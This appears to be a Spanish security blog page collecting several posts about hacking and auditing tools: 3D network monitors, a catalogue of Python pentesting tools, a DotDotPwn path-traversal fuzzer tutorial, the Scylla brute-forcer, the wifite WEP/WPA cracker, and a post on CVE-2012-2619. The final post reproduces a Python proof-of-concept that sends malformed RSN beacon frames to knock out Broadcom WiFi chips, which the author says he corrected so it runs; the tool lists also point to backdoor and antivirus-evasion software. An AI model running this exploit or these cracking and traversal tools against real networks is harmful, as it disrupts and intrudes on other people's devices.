Banner 1

Mostrando entradas con la etiqueta herramientas. Mostrar todas las entradas
Mostrando entradas con la etiqueta herramientas. Mostrar todas las entradas

Herramientas para visión en 3D de defensa perimetral de red.

0 comentarios
Existen herramientas para visión 3D de defensa perimetral de red, que nos permiten ver de una forma gráfica, no solo el tráfico de entrada y salida, también las potenciales amenazas de la red. Un ejemplo de este tipo de herramientas son: Scanmap3d, vSentinel, GraphicalOSfp y Hosts3D.

Scanmap3d es un programa escrito en Java como una demostración de concepto para la visualización de información de detección de intrusiones en la red. El programa lee la información que genera el IDS Snort en una  una base de datos MySQL y produce un mapa 3D de tráfico de la red ayudándose de un tcpdump.


Más información y descarga de Scanmap3d:
http://scanmap3d.sourceforge.net/

vSentinel es un mapeo 3D personalizable de la supervisión de la red, que puede visualizar:  los datos de seguridad en tiempo real y ataques a la red basados en tendencias y análisis de anomalías.

Más información y descarga de vSentinel:
http://sourceforge.net/projects/vsentinel/?source=directory

GraphicalOSfp es una aplicación python que tiene como objetivo recoger datos aleatorios emitidos por los sistemas remotos en las secuencias de IP y TCP. Estos datos se muestran en un referencial 3D, para mostrar con técnicas de fingerprinting los sistemas que interactúan en la red.

Más información y descarga de GraphicalOSfp:
http://sourceforge.net/projects/graphicalosfp/?source=directory

Hosts3D es un monitor 3D de red en tiempo real, permite visualización de hosts  y el tráfico de paquetes. Constituido por hsen (Hosts3D Sensor) un demonio de captura de paquetes que lee y envía la información de cabecera del paquete para Hosts3D, de forma local o remota. Puede trabajar con múltiples sensores pueden enviar información a varios equipos con Hosts3D en la misma subred a través de la difusión.

Características principales:
  • Organización automática hosts.
  • Detectar los hosts, sin tráfico.
  • Visualizar Anomalías (Nuevo host o puerto de servicio). Mostrar puerto de destino por encima de paquetes.
  • Mostrar sólo los hosts que reciben paquetes.
  • Exportar información a archivos CSV.
  • Encontrar hosts por IP, MAC, nombre de host, observaciones o puerto de servicio.
  • Permite simular paquetes de Broadcast.
Más información y descarga de Hosts3D: 
http://hosts3d.sourceforge.net/

Fuente: http://vtroger.blogspot.com/2014/10/herramientas-para-vision-en-3d-de.html

Free Opener, es un programa para abrir cualquier archivo de cualquier formato

0 comentarios
Uno de los grandes problemas de los formatos de archivo es que tenemos que tener varios programas distintos para poder abrirlos, y a veces pasa que tenemos que abrir un archivos que directamente ni sabemos con qué programa se abre.
Free Opener es una aplicación que abre lo que se les ocurra, soporta más de 75 formatos de archivos diferentes. Con este programita podemos abrir todos esos archivos sin la necesidad de tener instalados decenas de programas diferentes.
Les dejo la lista completa de formatos soportados después del break porque es larguísima:


1.   Code Files (.c, .cs, .java, .js, .php, .sql, .vb)
2.   Web Pages (.htm, .html)
3.   Photoshop Documents (.psd)
4.   Images (.bmp, .gif, .jpg, .jpeg, .tiff)
5.   XML Files (.resx, .xml)
6.   PowerPoint® Presentations (.ppt, .pptx)
7.   Media (.avi, .flv, .mid, .mkv, .mp3, .mp4, .mpeg, .mpg, .mov, .wav, .wmv)
8.   Microsoft® Word Documents (.doc, .docx)
9.   7z Archives (.7z)
10.   SRT Subtitles (.srt)
11.   RAW Images (.arw, .cf2, .cr2, .crw, .dng, .erf, .mef, .mrw, .nef, .orf, .pef, .raf, .raw, .sr2, .x3f)
12.   Icons (.ico)
13.   Open XML Paper (.xps)
14.   Torrent (.torrent)
15.   Flash Animation (.swf)
16.   Archives (.jar, .zip)
17.   Rich Text Format (.rtf)
18.   Text Files (.bat, .cfg, .ini, .log, .reg, .txt)
19.   Apple Pages (.pages)
20.   Microsoft® Excel Documents (.xls, .xlsm, .xlsx)
21.   Comma-Delimited (.csv)
22.   Outlook Messages (.msg)
23.   PDF Documents (.pdf)
24.   vCard Files (.vcf)

Lo pueden descargar del sito oficial: http://www.freeopener.com/download?type=other

Fuente: http://underc0de.org/foro/index.php?topic=15557.0

Recopilación de herramientas Python para pentesters

0 comentarios
Si estás involucrado en la investigación de vulnerabilidades, ingeniería inversa o pruebas de intrusión, seguro que ya habrás utilizado Python porque cuenta con un rico conjunto de librerías y herramientas útiles para estos menesteres.

En la página de Dirk Loss podemos encontrar un gran recopilatorio de herramientas escritas en Python para penetration testers, algunas de ellas sólo enlaces a librerías C existentes, es decir, herramientas que hacen las librerías fácilmente utilizables desde programas de Python.

Sin embargo, por la difusa situación jurídica en Alemania no se incluyen algunas de las herramientas más agresivas (frameworks PenTest, smashers bluetooth, escáneres de vulnerabilidades de aplicaciones Web, war-dialers, etc.). Por ello y para tener una lista aún más completa, vamos a ir añadiendo todas las herramientas que vayamos encontrando. No dudes en comentar esta entrada si conoces alguna más y quieres que la añadamos a esta lista:

 

Red



  • Dirtbags py-pcap: lee ficheros pcap sin libpcap
  • dpkt: rápida y simple creación de paquetes y análisis, con las definiciones básicas de los protocolos TCP/IP 
  • flowgrep: grep a través de payloads de paquetes utilizando expresiones regulares
  • glastopf: honeypot que se basa en un pequeño servidor web que emula cientos de vulnerabilidades.
  • Impacket: modifica y decodifica paquetes de red. Incluye soporte para los protocolos de más alto nivel, tales como NMB y SMB
  • Knock Subdomain Scan:  enumera los subdominios de un dominio de destino a través de una lista de palabras
  • LANs.py: herramienta capaz de falsificar y envenenar la tabla de ARP de un objetivo individual. Es multihilo y asíncrono.
  • libdnet: rutinas de red de bajo nivel, incluyendo la interfaz de búsqueda y transmisión de tramas Ethernet
  • Mallory: proxy man-in-the-middle extensible TCP/UDP, soporta la modificación de protocolos no estandar al vuelo
  • pypcap, Pcapy y pylibpcap: varios enlaces Python para libpcap
  • Pytbull: framework de pruebas de IDS/IPS muy flexible (incluye más de 300 tests)
  • pynids: wrapper de libnids que incluye sniffing, IP defragmentation, reensamblado de streams TCP y detección de escaneos de puertos
  • Scapy: envia, rastrea y analiza y crea paquetes de red. Se puede usar de forma interactiva o como una librería


Depuración e ingeniería inversa



  • Androguard: ingeniería inversa y análisis de aplicaciones de Android
  • apk-jet: un wrap de apktool en python para automatizar y hacer más fácil la ingeniería inversa de apks 
  • AsmJit: sencillo wrapper en Python para AsmJit usando SWIG. AsmJit posee clases de generación de código de alto nivel que pueden utilizarse para crear código JIT
  • BeaEnginePython: bindings de BeaEngine en Python de Mario Vilas. 
  • Binwalk: es una herramienta de análisis firmware diseñada para ayudar en el análisis, la extracción y la ingeniería inversa de imágenes del firmware y otros blobs binarios. Es fácil de utilizar, completamente programable y se puede extender fácilmente a través de firmas personalizadas, reglas de extracción y módulos de plugin.
  • bochs-python-instrumentation: Este parche para Bochs proporciona un intérprete de Python en lugar del propio depurador Bochs, proporcionando la funcionalidad del depurador. También permite interactuar con la interfaz de instrumentación bajo demanda, al asociar dinámicamente métodos de Python para manejar eventos de instrumentación.
  • Buggery: wrapper python para DbgEng. 
  • ctypes: módulo de Python que permite crear y manipular tipos de datos de C en Python. Estos luego pueden pasar a funciones C cargadas desde librerías de vínculos dinámicos.
  • Cuckoo: sistema sandbox de análisis de malware automatizado. Tiene un API para personalizar tanto el procesamiento como las etapas de presentación de informes. 
  • Darm: Un ligero y eficiente desensamblador escrito en C para el conjunto de instrucciones ARMv7
  • Deviare: es una API para hooks diseñada para crear productos de usuario final
  • Diabind: Python binding de DIA (Debug Interface Access) SDK
  • Dislib: Librería python para leer ficheros PE+
  • diStorm:  biblioteca de desensamblador para AMD64, bajo licencia BSD
  • IDAPython: plugin de IDA Pro que integra Python, permitiendo ejecutar scripts en IDA Pro
  • Immunity Debugger: GUI programable y debugger en linea de comandos
  • Paimei: framework de ingeniería inversa, incluye PyDBG, PIDA, pGRAPH
  • pefile: permite leer y trabajar con archivos Portable Executable (PE) 
  • pydasm: interfaz en Python para la librería libdasm de desensamblado x86
  • PyDbgEng: wrapper en Python para el motor de depuración de Microsoft Windows 
  • PyEMU: emulador IA-32 completamente programable, útil para análisis de malware
  • python-ptrace:depurador usando ptrace (Linux, BSD y Darwin system call para trazar procesos) escrito en Python
  • mona.py: PyCommand para Immunity Debugger que reemplaza y mejora pvefindaddr
  • uhooker: intercepta llamadas a llamadas a la API dentro de DLLs , así como las direcciones arbitrarias en el archivo ejecutable en la memoria
  • vdb / vtrace: API de depuración de procesos multi-plataforma implementado en python, y vdb es un depurador que lo utiliza


Fuzzing



  • antiparser: fuzz testing y API de inyección de fallos
  • Construct: librería para parsear y construir estructuras de datos (binario o texto).  
  • Forensic Fuzzing Tools: genera ficheros fuzzeados, sistemas de ficheros, y sistemas de ficheros con ficheros fuzzeados para probar la robustez de herramientas forenses y sistemas de análisis 
  • Fusil: librería en Python usada para escribir programas de fuzzing 
  • fuzzer.py (feliam): fuzzer sencillo de Felipe Andres Manzano 
  • Fuzzbox: multi-codec media fuzzer
  • Mistress: genera formatos de archivos al vuelo y protocolos con datos malformados, basados en patrones predefinidos
  • Peach Fuzzing Platform: framework de fuzzing extensible para la generación y la mutación basada en fuzzing (la v2 fue escrita en Python)
  • Powerfuzzer: fuzzer web altamente automatizado y totalmente personalizable (protocolo HTTP basado en fuzzer de aplicación)
  • SMUDGE 
  • Sulley: framework de desarrollo fuzzer y pruebas que consiste en varios componentes extensibles
  • TAOF: (el Arte del Fuzzing) incluye ProxyFuzz, un fuzzer man-in -the-middle de red no determinista
  • untidy: fuzzer XML de propósito general
  • Windows IPC Fuzzing Tools: herramientas para fuzzear aplicaciones que usan mecanimos Windows Interprocess Communication
  • WSBang: ejecuta pruebas automáticas contra servicios web SOAP


Web



  • FunkLoad: medidor de carga web funcional
  • Ghost.py: cliente webkit escrito en Python 
  • HTTPie: cliente http similar a cURL pero más intuitivo. 
  • mitmproxy: proxy HTTP de interceptación con soporte SSL. Permite inspeccionar y editar tráfico al vuelo. 
  • Requests: librería HTTP sencilla y elegante, hecha para seres humanos
  • Twill: navega por Internet mediante un interface en línea de comandos. Soporta web testing automatizado
  • pathod / pathoc: demonio/cliente para saturar clientes y servidores HTTP
  • ProxMon: procesa logs de proxy y crea informes con los resultados
  • python-spidermonkey: binding para el motor JavaScript de Mozilla SpiderMonkey; permite llamar y evaluar scripts y funciones Javascript
  • Selenium: API para escribir pruebas funcionales usando el WebDriver Selenium para acceso a Firefox, Ie, Chrome, Remote etc. 
  • Splinter: herramienta para testear aplicaciones web usando Python que permite automatizar acciones del navegador como visitar URLs e interactuar con sus objetos.
  • spynner: módulo de navegación web programable para Python con soporte Javascript/AJAX
  • WSMap: encuentra servicios web y descubre ficheros
  • Windmill: herramienta de pruebas creada para automatizar y depurar aplicaciones web


Cracking

  • findmyhash:  script en Python para crackear hashes usando servicios online.


Malware



  • pyew: una herramienta desde la línea de comandos para analizar malware de forma estática.
  • Noriben: script que funciona en conjunción con Procmon de Sysinternals para analizar malware en sandbox.
  • s7-brute-offline.py: herramienta que que puede realizar ataques off-line de fuerza bruta contra controladores lógicos programables (PLCs) Siemens.
  • The Backdoor Factory: un interesante script en Python para "backdoorizar" ejecutables y librerías de Windows (Win32 PE).
  • Tiny SHell: el clásico backdoor de código abierto en Python de Christophe Devine
  • TinySHell bajo SCTP: un backdoor de Unix un poquito más indetectable 
  • Veil: herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus.
  • virustotal-search.py: script para automatizar desde la línea de comandos el análisis de una muestra de malware a través del conocido servicio de multiAV de Virustotal.

Forense



  • aft: Android forensic toolkit
  • FBStalker y GeoStalker: herramienta OSINT para Facebook y fuentes de geolocalización - Flickr, Instagram, Twitter, Wigle. Los ID de usuario encontrados son utilizados para encontrar cuentas de redes sociales a través de otras redes como Facebook, Youtube, Instagram, Google+, Linkedin y Google Search
  • Grampus: herramienta multiplataforma de extracción de metadatos y footprinting, algo así como una FOCA en python y de código abierto.
  • LibForensics: librería para desarrollar aplicaciones forenses digitales 
  • sqlparse.py: parser para recuperar datos borrados de bases de datos SQLite
  • TrIDLib: identifica los tipos de archivo de sus firmas binarias. Ahora incluye Python binding
  • Volatility: extrae y analiza artefactos digitales de la memoria volátil (RAM) 


Análisis de malware



  • Exefilter: filtra formatos de archivo en mensajes de correo electrónico, páginas web o archivos. Detecta muchos formatos de archivo comunes y puede eliminar contenido.
  • OS X Auditor: herramienta gratuita de análisis forense para Mac OS X.
  • phoneyc: implementacion de honeyclient totalmente escrito en python
  • pyew: editor hexadecimal y desensamblador en línea de comandos, principalmente usado para analizar malware
  • pyClamAV:  añade capacidades de detección de virus para tu software Python
  • pyMal: framework para análisis de malware basada en Pefile, Pydbg y Volatility. 
  • jsunpack-n: unpacker de JavaScript genérico: emula la funcionalidad del navegador para detectar exploits dirigidos a explotar vulnerabilidades en navegadores y plugins
  • yara-python: identifica y clasifica muestras de malware


PDF



  • Didier Stevens' PDF tools: analiza, identifica y crea ficheros PDF (incluye PDFiD, pdf-parser, make-pdf y mPDF)
  • Opaf: Open Framework Analysis PDF . Convierte PDF a un árbol XML que puede ser analizado y modificado.
  • Origapy: wrapper de Python para el módulo de Ruby Origami que desinfecta archivos PDF
  • PDFMiner: extrae texto de ficheros PDF 
  • pyPDF: Python PDF toolkit: extrae info, corta, une, cifra, descifra...
  • python-poppler-qt4: une Python con la librería Poppler PDF, incluyendo soporte Qt4


Misc



  • Exomind: para la creación de gráficos y el desarrollo de módulos de inteligencia de código abierto, centrada en servicios de redes sociales, motores de búsqueda y mensajería instantánea
  • Hachoir: permite ver y editar un stream binario campo por campo
  • InlineEgg: toolbox de clases para escribir pequeños programas en Python
  • PyMangle: herramienta de línea de comandos y una biblioteca de Python utilizada para crear listas de palabras para su uso con otras herramientas de pruebas de intrusión
  • RevHosts: enumera los virtual hosts de una dirección IP dada
  • simplejson: JSON encoder/decoder, para por ej. usar Google's AJAX API


Otras herramientas y librerías útiles



  • Beautiful Soup: HTML parser optimizado para screen-scraping
  • IPython: shell Python interactivo y mejorado con algunas características para la introspección de objetos, acceso a una consola del sistema y su propio sistema especial de comandos 
  • lxml: librería más rica en características y fácil de usar para trabajar con XML y HTML
  • M2Crypto: wrapper OpenSSL más completo
  • matplotlib: construye gráficos 2D de matrices
  • Mayavi: 3D de visualización de datos científicos y plotting
  • NetworkX: librería gráfica (bordes, nodos)
  • Pandas: librería que proporciona mayor rendimiento y mayor facilidad de uso para analizar estructuras de datos de alto rendimiento y herramientas de análisis de datos
  • Pexpect: controla y automatiza otros programas, similar al sistema Don Libes `Expect
  • PyQt y PySide: Python bindings para el framework Qt y librería GUI
  • pyparsing: módulo de parsing general
  • RTGraph3D: crea gráficos dinámicos en 3D
  • Sikuli, tecnología visual para buscar y automatizar interfaces gráficas de usuario con capturas de pantalla. Programable en Jython
  • Suds:  cliente SOAP ligero para servicios Web
  • Twisted: motor de creación de redes basada en eventos
  • Whoosh: rápido, con muchas características de indexación de texto completo y búsqueda de librería implementado en Python 
Fuente: http://www.hackplayers.com/2013/11/recopilacion-de-herramientas-en-python-para-pentesters.html

Directory Traversal con Dotdotpwn v3.0 Parte (I)

0 comentarios
 directorios
Muchas veces cuando testeamos un parametro o url en busca de una vulneravilidad de tipo Path traversal, se hace insoportable tener que estar inyectando posibles vectores en afan de encontrar una respuesta atipica en el servidor y asi poder visualizar el fichero deseado. Para esta tediosa tarea podemos contar con la ayuda de un fuzzer poderoso como lo es DotDotpwn, la idea de esto, es la de armar un tutorial completo sobre la herramienta. Para los que desconoscan de esta tecnica aca les dejo unos link donde pueden encontrar buena informacion respecto a su desarrollo.
Bueno comencemos presentando a esta belleza escrita en perl , que ya va por su version 3.0.

     Caracteristicas:

  • Algoritmo de biseccion que mejora la deteccion de vulnerabilidades.
Que carajo es eso?…bueno, es un metodo matematico que se encarga de buscar raices, dividiendo un intervalo a la mitad y seleccionando el subintervalo que tiene la raiz. Para los que no sepan lo que es la raiz, vieron esa p$t# “x” que se encontraba en las ecuaciones que nos daban en la escuela!…ahora se acuerdan no?.
  • Ademas de GET se añadieron otros metodos de peticiones HTTP (POST|MOVE|COPY|HEAD)
  • Cuenta con un modificador para especificar la extensión del archivo que se adjunta al final de cada cadena (*.jpg, *.php, *.inc, *.pdf, *.doc, *.sql)
  • Nueva codificacion de cararcteres ../ en UTF-8 Hex Encoding y URI Hex Encoding.
    • Soporte para los soguientes modulos:

  • - HTTP
  • - HTTP URL
  • - FTP
  • - TFTP
  • - Payload (Independiente del protocolo)
  • - STDOUT
 Bueno basta de introducciones y comenzemos por fin a probar este fierraso. Para que Dotdotpwn funcione correctamente deberan tener las siguientes requerimientos en su sistema.

      Requerimientos:

  • Modulos de perl:
  • Net::FTP
  • TFTP
  • Time::HiRes
  • Socket
  • HTTP::Lite
  • IO::Socket
  • Getopt::Std
  •  Switch
Para instalar los moudulos hacemos uso de cpan, este es un gestor de descargas para modulos de perl.
$ sudo cpan
 cpan[1]>install HTTP::Lite
 cpan[2]>install Net::FTP
 cpan[3]>install TFTP
 cpan[4]>install Time::HiRes
 cpan[5]>install Socket
 cpan[6]>install IO::Socket
 cpan[7]>install Getopt::Std
 cpan[8]>install Switch
Ahora si! descargamos DotDotPwn, extraemos y lo lanzamos!.
 Dotdotpwn
A continuacion paso a explicar las distintas opciones con las que cuenta.

Modo de uso:

./dotdotpwn.pl -m -h [OPCIONES]
Lista de Opciones:
  • -m   Tipos de modulos que soporta [http | http-url | ftp | tftp | payload | stdout]
  • -h    Hostname
  • -O   Hace una deteccion del sistema operativo a travez del uso de nmap
  • -o    Si por alguna razon sabes el tipo de S.O que utiliza el servidor podemos especificarlo para ahorrar tiempo (“windows”, “unix” o “generico”)
  • -s    Deteccion de la version de servicios
  • -d    Con esta opcion podemos establecer la cantidad de ../ a inyectar, por defecto usa 6 espacios.
  • -f    Especificamos el tipo de archivo a buscar
  • -E   Agrega las direcciones de archivos que se encuentran en el fichero TraversalEngine.pm
  • -u    Indicamos la url en la que haremos la inyeccion del vector, en el parametro a inyectar usaremos la variable TRAVERSAL quedando de esta manera: http://foo:8080/id.php?x=TRAVERSAL&y=31337)
  • -k    Busca una cadena en alguna respuesta del servidor, por ejemplo si estamos buscando el fichero /etc/passwd le establecemos la palabra “root:”,esta opcion es necesaria cuando utilizamos los modulos http-url y Payload
  • -p    Nombre del payload que usaremos en la variable TRAVERSAL
  • -x    Puerto (default: HTTP=80; FTP=21; TFTP=69)
  • -t    Tiempo en milisegundo entre cada testeo (default: 300 (.3 second))
  • -X    Indicamos que use el algoritmo de biseccion.
  • -e    Indicamos las extenciones de archivos para realizar un fuzzing a la cadena ( “.php”, “.jpg”, “.inc”)
  • -U    Username (default: ‘anonymous’)
  • -P    Password (default: ‘dot@dot.pwn’)
  • -M   Metodos HTTP a usar para el envio [GET | POST | HEAD | COPY | MOVE] (default: GET)
  • -r     Establece el nombre del archivo de log donde se guardara el test (default: ‘HOST_MM-DD-YYYY_HOUR-MIN.txt’)
  • -b    Parara cuando se encuentre la primer vulnerabilidad
  • -q    No imprime la salida del programa.
Bueno eso es todo por hoy! en el proximo post empezare con las pruebas de fuzzing y  desarrollare el uso de todos los modulos presentes en Dotdotpwn.

Quemar despues de leer

0 comentarios
Quien no se acuerda de la ya mítica frase "este mensaje se auto-destruirá en 30 segundos"... Uno de los grandes peligros de Internet es que, como nuevo sistema de comunicación, mucha gente aún no es completamente consciente de los peligros que conlleva poner enormes cantidades de información personal en servidores sobre los que no tenemos ningún control.

Hoy por hoy existen infinidad de herramientas que de forma automática se dedican a recopilar información personal como por ejemplo MALTEGO o la FOCA, que explotan la red buscando información almacenada en servidores, caché, material no indexado, etc.

Esto supone una grave amenaza a nuestra intimidad, pudiendo hacer pública información sensible. Sin darnos cuenta nosotros mismos vamos dejando miguitas de pan que un astuto enemigo puede ir recogiendo hasta llenar la cesta de nuestra desdicha... Ante esto no es descabellado pensar en una autopolítica de gestión de nuestra información y tomar medidas tales como cifrar mensajes o, por qué no, generar mensajes que se auto-destruyan a lo inspector Gadget. 

Hay herramientas y websites que nos permiten llevar a la practica esta medida de seguridad extra para con nuestra información, tales como:
 

Burn note: es un website que permite una comunicación privada entre dos puntos. 

No es obligatorio realizar registro de usuario alguno, aunque esta opción es posible. 

A la hora de escribir el mensaje privado que deseamos enviarle al destinatario podremos establecer un temporizador para hacer desaparecer la nota tras los segundos que indiquemos, además de proteger el mensaje mediante contraseña. Si no activamos el temporizador, el destinatario tendrá tan sólo tres minutos para leer el contenido. Tras escribir la nota nos dará un enlace que deberemos hacer llegar al destinatario. Otros sites similares



Tiger tex: es una herramienta para iPhone, Android, Blackberry y Windows Phone 7


El sistema presentado en febrero del año pasado permite proteger la privacidad de los mensajes SMS que se mandan de un celular a otro. La única condición es que ambos móviles que se comunican entre sí tengan instalada esta aplicación. En este caso los textos se convierten en auto-destructivos: una vez enviado el mensaje, se borra en el celular del remitente; una vez leído por el destinatario, también se auto-destruye en el celular de este. Además desaparecen de los datos de la compañía telefónica, con lo que resultan irrecuperables. La opción funciona también para las fotos y los vídeos. 

La aplicación está disponible sobre todo para Iphone, aunque los creadores están trabajando en versiones para otros soportes. Esta herramienta le habría venido muy bien a Tiger woods xdd

Vanish: (programa creado por dos estudiantes de la universidad de Washington), podemos tener un grado más de seguridad gracias a la autodestrucción de los textos de correos electrónicos, mensajes en foros, blogs, etc. en una fecha programada por dicho usuario. 


La forma de actuar de Vanish es cifrar el contenido de este texto con una llave que ni siquiera el propio usuario del programa conocerá. 

Una vez cifrado el texto con Vanish y elegida la fecha de autodestrucción, el texto será legible (usando Vanish para descifrarlo) pero, al llegar la fecha fijada, el texto desaparecerá ya que Vanish romperá la llave de cifrado repartiendo infinidad de trozos de ésta por la red usando la tecnología P2P. Por cada ordenador que tenga una parte de la llave y que se desconecte se irá borrando parte del texto haciéndola al final completamente ilegible.

Fuente: http://www.hackplayers.com

Scylla

0 comentarios

Un placer hacer un post para un compañero de foro como lo es flacman :) y demas integrantes del cut que hicieron posible esta herramienta.
 
Scylla es una herramienta para auditar diferentes protocolos online y configuraciones, construida sobre un motor bruteforce. Esta herramienta actua como
una herramienta para la unificación de varias técnicas de auditoría, hace lo que oscanner, winfingerprint, Hydra, DirBuster, cosas que estas herramientas hacen, pero tambien algunas cosas que éstas no hacen.

Scylla es sin duda, la primera herramienta de hacking/auditoría open source gratuíta para protocolos como LDAP, DB2, Postgres, terminal y Mssql; Scylla incluye toneladas de características que otras herramientas tienen, pero con una diferencia clave: lo hace mas rápido y "más inteligente".

Protocolos soportados:
  • Terminal (Telnet, SSH, telnets)
  • FTP (FTPS, FTP, SFTP)
  • SMB (Tambien Windows RPC)
  • LDAP
  • POP3 (POP3S)
  • SMTP (SMTPS)
  • IMAP
  • MySql
  • MSSQL
  • Oracle (DB y TNS Listener)
  • DB2 (DB y DAS)
  • HTTP (HTTPS; Basic AUTH Brute Force, Digest AUTH Brute Force, Form Brute Force, Brute Force de archivos y directorios)
  • DNS (DNS Snooping)
  • Postgres SQL
Las funciones en 3 etapas básicas: - Etapa Pre-Hack, etapa Brute Force y etapa Post-Hack.

Características básicas:
- User, password list based Brute force
- Multiple hosts support
- Multiple session support
- Nmap integration
- Non-synchronized threads (proof to be a bit faster)
- Ability to restore sessions
- Session auto-saving (based on SQL Server CE)
- Easy to use
- Auto configured options
- Hacker oriented
- Free, and always free
- Database browser (who have hacked a DB and don’t have a DB client to connect to it? And worse if you don’t have internet)
- Open source tool

Descarga: http://code.google.com/p/scylla-v1/downloads/list
Más capturas de pantalla: http://code.google.com/p/scylla-v1/wiki/ScyllaScreenShots
Fuente original (inglés): http://security-sh3ll.blogspot.ro/2012/11/scylla-v10-advanced-audit-tool.html
Post: http://underc0de.org/foro/hacking-basico/scylla-v-1-0-advanced-audit-tool
http://www.underc0de.com

wifite - Herramienta para cracking masivo de claves WEP/WPA

0 comentarios

Wifite es una herramienta capaz de atacar a múltiples redes cifradas con WEP y WPA al mismo tiempo. Está diseñada para la distribución Ubuntu de Backtrack 4 RC1 y entre sus principales características destaca:
- Clasifica los objetivos por potencia de la señal (en dB); primero crackea los puntos de accesos más cercanos
- Todos las negociaciones WPA son salvadas (al directorio de trabajo correspondiente de wifite.py)

- Incluye opciones de "mid-attacks": parar un ataque con Ctrl+C para ver las opciones de continuar, cambiar al siguiente objetivo, saltar el crackeo o salir

- Numerosos filtros para especificar exactamente que hay que atacar (wep/wpa/ambos, fuerza de la señal, canales, etc.)
- Posee opciones muy configurables (timeouts, paquetes/segundo, etc.)

- Soporte SKA (no certificado)

- Encuentra dispositivos en el modo monitor, si no, solicita uno

- Todas las contraseñas son guardadas en el fichero log.txt

- El cambio entre ataques WEP no resetea los IVs

- Muestra un resumen de la sesión al salir; muestra las contraseñas crackeadas


Podéis descargarlo aquí:
wifite.py
Fuente:http://www.hackplayers.com

Denegación de servicio a multitud de smartphones vía WiFi

0 comentarios
Estaba en mi casa tranquilamente decidiendo sobre el tema de una nueva entrada para hackplayers, cuando de pronto me llegó el siguiente email que os lo dejo integro tal y como lo recibí. Jejeje así me ahorro unos cuantos caracteres y me sirve de intro, que ando algo malito por el cambio estacional:

"Se ha publicado una vulnerabilidad presente en determinados Chipset de la firma Broadcom, en especial los modelos BCM4325/29 integrados en multitud de dispositivos inalámbricos como smartphones, tablets e incluso vehículos (como el Ford Edge).

El fallo permitiría realizar una denegación de servicio al módulo inalámbrico e incluso la revelación de información sensible según los propios investigadores. El fallo podría reproducirse atacando directamente al módulo WiFi independientemente del sistema operativo presente en el dispositivo. 


La vulnerabilidad (CVE-2012-2619) reportada por el laboratorio de CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, el cual que hizo una demostración pública durante la pasada Ekoparty en Buenos Aires, Argentina. Su compañero Matias Eissler desarrolló la prueba de concepto totalmente funcional. 


Mediante estudios de ingeniería inversa consiguieron comprender la estructura del firmware de los dispositivos Broadcom, hallando la forma de alterar el tráfico WiFi (normativa IEEE 802.11) de tal manera que afectara a dichos dispositivos inalámbricos a través del envío de tramas RSN (IEEE 802.11i, WPA/WPA2) especialmente manipuladas. 

El protocolo RSN (Robust Security Network) interviene en la negociación y establecimiento del tipo de autenticación y cifrado utilizado durante una sesión WPA/WPA2. 


En coordinación con los investigadores y el US-CERT, Broadcom facilitó 

a los diferentes fabricantes (Apple, HTC, Motorola, Sony, Nokia, Samsung...) un nuevo firmware que impide la vulnerabilidad para integrarlo en sus dispositivos, "por lo que se da como subsanada" XDD

Los dispositivos afectados con el chipset BCM4325: 


  • Apple iPhone 3GS 
  • Apple iPod 2G 
  • HTC Touch Pro 2 
  • HTC Droid Incredible 
  • Samsung Spica 
  • Acer Liquid 
  • Motorola Devour 
  • Vehículo Ford Edge 
Dispositivos afectados con el chipset BCM4329: 
  • Apple iPhone 4 
  • Apple iPhone 4 Verizon 
  • Apple iPod 3G 
  • Apple iPad Wi-Fi 
  • Apple iPad 3G 
  • Apple iPad 2 
  • Apple Tv 2G 
  • Motorola Xoom 
  • Motorola Droid X2 
  • Motorola Atrix 
  • Samsung Galaxy Tab 
  • Samsung Galaxy S 4G 
  • Samsung Nexus S 
  • Samsung Stratosphere 
  • Samsung Fascinate 
  • HTC Nexus One 
  • HTC Evo 4G 
  • HTC ThunderBolt 
  • HTC Droid Incredible 2 
  • LG Revolution 
  • Sony Ericsson Xperia Play 
  • Pantech Breakout 
  • Nokia Lumina 800 
  • Kyocera Echo 
  • Asus Transformer Prime 
  • Malata ZPad"
Bueno una vez vista la noticia, gracias a los chicos de hispasec.com vamos a ver de que va un poco todo esto:

A la noticia le acompañaba el siguiente script de python, el cual en principio tiene un par de erratas que supongo pusieron a propósito ;D. Así que editamos el código en nuestro editor preferido y corregimos:


*Poned especial atencion en los campos que he coloreado.

Enlace al codigo: http://pastebin.com/KNiAx2Vw

---------------------------------------------------------------------------------------------
#!/usr/bin/env python 

import sys 
import time 
import struct 
import PyLorcon2 

def beaconFrameGenerator(): 
    sequence = 0 
    while(1): 
        sequence = sequence % 4096 

        # Frame Control 
        frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon 
        frame += '\x00' # Flags: 0 
        frame += '\x00\x00' # Duration: 0 
        frame += '\xff\xff\xff\xff\xff\xff' # Destinationff:ff:ff:ff:ff:ff 
        frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad 
        frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad 
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence
#part of the generator 
        # Frame Body 
        frame += struct.pack('Q', time.time()) # Timestamp 
        frame += '\x64\x00' # Beacon Interval: 0.102400 seconds 
        frame += '\x11\x04' # Capability Information: ESS, Privacy
#Short Slot time 
        # Information Elements 
        # SSID: buggy 
        frame += '\x00\x05buggy' 
        # Supported Rates: 1,2,5.5,11,18,24,36,54 
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' 
        # DS Parameter Set: 6 
        frame += '\x03\x01\x06' 
        # RSN IE 
        frame += '\x30' # ID: 48 
        frame += '\x14' # Size: 20 
        frame += '\x01\x00' # Version: 1 
        frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP 
        frame += '\x01\x00' # Pairwise cipher suite count: 1 
        frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP 
        frame += '\xff\xff' # Authentication suites count: 65535 
        frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK 
        frame += '\x00\x00' 

        sequence += 1 
        yield frame 

if __name__ == "__main__": 
    if len(sys.argv) != 2: 
        print "Usage:" 
        print "\t%s <wireless interface>" % sys.argv[0] 
        sys.exit(-1) 

    iface = sys.argv[1] 
    context = PyLorcon2.Context(iface
    context.open_injmon() 

    generator = beaconFrameGenerator() 

    for i in range(10000): 
        frame = generator.next() 
        time.sleep(0.100) 
        context.send_bytes(frame

---------------------------------------------------------------------------------
Cerramos nuestro editor guardando el archivo como poc.py.

